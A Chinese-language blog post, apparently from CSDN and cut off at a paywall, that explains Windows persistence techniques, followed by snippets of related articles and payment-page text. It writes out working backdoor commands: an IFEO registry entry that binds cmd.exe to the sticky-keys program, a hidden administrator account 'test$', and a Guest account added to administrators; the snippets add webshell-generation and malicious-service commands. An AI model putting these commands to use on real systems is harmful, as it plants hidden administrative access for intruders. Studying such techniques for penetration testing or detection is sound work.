Windows权限维持

已于 2022-07-03 12:13:15 修改
阅读量482 收藏 1
点赞数
CC 4.0 BY-SA版权
分类专栏: windows维权 文章标签: windows 服务器 运维
于 2022-07-03 12:05:12 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_40012781/article/details/125582989
本文详细介绍了Windows系统中多种权限维持的手段,包括映像劫持、激活Guest用户、克隆账户、rid_hijack和shift后门。通过设置注册表、利用MSF、Empire和Cobalt Strike等工具,实现远程登录后的权限保持和隐蔽后门的创建。同时,提到了检测和清理这些权限维持措施的方法,如使用D盾_web查杀工具。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

远程登录类

映像劫持

“映像劫持”,也被称为“IFEO”(Image File Execution Options),在WindowsNT架构的系统里,IFEO的本意是为一些在默认系统环境中运行时可能引发错误的程序执行体提供特殊的环境设定。当一个可执行程序位于IFEO的控制中时,它的内存分配则根据该程序的参数来设定,而WindowsN T架构的系统能通过这个注册表项使用与可执行程序文件名匹配的项目作为程序载入时的控制依据,最终得以设定一个程序的堆管理机制和一些辅助机制等。出于简化原因,IFEO使用忽略路径的方式来匹配它所要控制的程序文件名,所以程序无论放在哪个路径,只要名字没有变化,它就运行出问题。

注册表位置:HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\

在此注册表位置添加项sethc.exe,添加debugger键的值为c:\windows\system32\cmd.exe

reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /v "Debugger" /t REG_SZ /d "c:\windows\system32\cmd.exe" /f

此时点击五次shift键会打开cmd。(利用时,可以远程登录,然后多次点击触发后门上线)

影子账户

net user test$ 123456 /add&&net localgroup administrators test$ /add

激活Guest用户

net user guest /active:yes
net user guest 1234
net localgroup administrators guest /add

windows cmd命令行的切换用户设置

在打开的命令行中输入 runas /user:administrator cmd
最低0.47元/天 解锁文章

200万优质内容无限畅学
[权限维持] Windows 权限维持 —— 影子账户后门 - 克隆账户
Blue17 の 小窝
02-28 946
问题描述  分别在Windows和Linux操作系统上安装Metasploit软件,并运行Metasploit完成针对Linux靶机usermap_script漏洞的渗透攻击,尝试使用植入VNC图形化远程控制工具的攻击载荷,成功获得Linux靶机上的远程控制桌面。做权限维持的前提是你已经拿到了靶机的一个权限(一般还是高权限,不然部分后门你还没有权限写入),所以我们得先用攻击机生成一个木马文件,上传靶机后运行,先拿到靶机的一个权限。这部分我们站在防守者视角,来排查下高级款的影子账户后门。
.NET 一款支持8种方式维持权限的工具
ahhacker86的专栏
06-27 423
Sharp4RedPersist是一款功能强大的持久化工具,专为在Windows环境中操作的红队设计。通过利用各种持久化机制,这款工具能够在被攻陷的系统上维持访问权限。Sharp4RedPersist支持八种或更多不同的方法,确保通过多个向量保持持久访问。
windows系统维权
愿路途漫长,莫失莫忘。 愿不骄不躁,安稳顺心。
09-05 212
C: \Users\用户名\AppData\Roaming\Microsoft\Windows\Start\Menu\Programs\Startup #用户级普通权限。C: \ProgramData\Microsoft\Windows\Start Menu\Programs\Startup #系统级,需要system权限。sc create "test" binpath= "C:\Users\Administart\Desktop\shell.exe" #创建服务。重启win10机器,靶机上线。
windows权限维持之注册表自启动
weixin_51692662的博客
05-05 398
windows权限维持之注册表自启动
【神兵利器】后渗透-权限维持工具之HackerPermKeeper
youmaob的博客
04-03 968
通过渗透拿到权限之后,为了不让权限丢失,都会进行权限维持,而在进行权限维持的时候,红队需要花费大量的时候,来验证是否合适,因此在这款工具就诞生 HackerPermKeeper[黑客权限保持者]OpenSSH后门万能密码&记录密码(这个需要依赖环境),就是把对方的门换个锁,但是原来的钥匙也可以使用。|| 越少,越难发现,但是部署起来,需要的依赖很多。ssh软链接&crontab。crontab后计划任务。发现程度:||||||发现程度:||||||发现程度:||||||发现程度:||||||
内网渗透-window权限维持
lza20001103的博客
04-15 1151
内网渗透-window权限维持
内网渗透之windows权限维持
07-18
【标题】"内网渗透之windows权限维持"揭示了网络安全领域的一个重要话题——在Windows操作系统环境中如何保持已获得的权限,以便进行深度的系统分析或恶意活动。这通常涉及到对系统内部工作原理的理解,以及利用特定...
2024年最新Windows权限维持技术总结、复现_cs权限维持,网络安全开发技术总结
2401_84264692的博客
05-06 998
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon的作用是指定用户登录时 Winlogon 运行的程序。默认情况下,Winlogon 运行 Userinit.exe(运行登录脚本),重新建立网络连接,然后启动 Windows 用户界面 Explorer.exe。可以更改此条目的值以添加或删除程序。
linux权限维持-HackerPermKeeper
SuperherRo的博客
05-09 576
通过渗透拿到权限之后,为了不让权限丢失,都会进行权限维持,而在进行权限维持的时候,红队需要花费大量的时候,来验证是否合适,因此在这款工具就诞生 HackerPermKeeper[黑客权限保持者]
webshell管理工具(权限维持)笔记
边城浪子的博客
11-15 595
1.chopper 2.Cknife 3.WeBaCoo 命令:webacoo -g -o hack.php 连接命令:webacoo -t -u http://192.168.152.130/pentest/test/11/upload/hack.php 成功连接 4.Weevely 命令:weevely generate 123456 hack.php 命令:weevely http://1...
windows环境变量滥用维权/提权
qq_50854662的博客
09-14 410
windows环境变量滥用维权/提权
010109权限维持
TangTang_AM的博客
04-03 457
9-1权限维持 1. 权限维持的原因 前提:某目标服务器初始化现阶段存在安全漏洞,可以被利用拿到服务器权限。 一段时间后,系统管理员对系统进行升级,打补丁(patch),系统不存在安全漏洞,导致无法利用漏洞获得服务器权限。 2. 权限维持的使用 技术本身不具备好与坏,只是因为使用者的目的不同,导致结果的好与坏。 恶意人员利用权限维持技术,一直获得服务器权限。 合法且被授权的渗透测试人员,利用权限维持为了证明服务器存在对应的安全漏洞。 3. 权限维持案例环境介绍 目标机器:win7 没有m
十三、权限维持
谢小二的博客
06-12 1417
权限维持
各种Window权限维持姿势合集
11-19 534
Pentestlab博客自10月1号开始,按照ATT&CK技术框架的持久性技术点,更新了一系列关于Window权限维持的文章,现在还在不断更新中。我认为这是一个非...
权限维持—Linux系统&Rootkit后门
最新发布
2301_76227305的博客
03-22 1009
一般来说,Rootkit自身并不是恶意软件,它是恶意软件用来隐藏自己的一种手段。但经二次改造的Rootkit可能包括间谍软件和其它的程序,如监视网络通信和用户击键的程序,也可以在系统中构建一个后门便于黑客使用,被改造的Rootkit恶意软件可以包含多个恶意工具,其中通常包括用于启动分布式拒绝服务(DDoS)攻击的机器人;可以禁用安全软件,窃取银行和信用卡详细信息以及窃取密码的软件;和击键记录器。
Windows 权限维持手法
qq_53742230的博客
07-20 1054
Windows 权限维持手法总结
windows权限维持
qq_32445755的博客
02-02 377
这时使用 “net user” 无法发现隐藏用户,但是可以从控制面板查看。
Windows权限维持技术总结、复现
leah126的博客
03-13 1164
的作用是指定用户登录时 Winlogon 运行的程序。默认情况下,Winlogon 运行 Userinit.exe(运行登录脚本),重新建立网络连接,然后启动 Windows 用户界面 Explorer.exe。可以更改此条目的值以添加或删除程序。例如,要在 Windows 资源管理器用户界面启动之前运行某个程序,可以将该程序的名称替换为该条目的值中的 Userinit.exe,然后在该程序中包含启动 Userinit.exe 的指令。在 Windows 上有一个重要的机制,也就是服务。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值